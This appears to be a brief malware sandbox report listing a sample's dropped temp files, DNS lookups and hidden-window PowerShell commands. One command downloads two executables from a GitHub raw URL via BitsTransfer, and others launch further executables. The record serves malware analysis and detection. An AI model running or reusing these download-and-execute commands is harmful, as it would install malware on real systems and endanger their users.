Technical information
- %TEMP%\ixp000.tmp\kgwkwru.dat
- %TEMP%\ixp000.tmp\gqas
- %TEMP%\ixp000.tmp\gqas
- %TEMP%\ixp000.tmp\kgwkwru.dat
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK microsoft.com
- DNS ASK ra#.####ubusercontent.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/gzxa/v/main/bild.exe,https://raw.githubusercontent.com/gzxa/v/main/SRBPolaris.exe -Destination ...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Start-Process tiyF.exe; Start-Process miJD.exe;' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Start-Process tiyF.exe; Start-Process miJD.exe;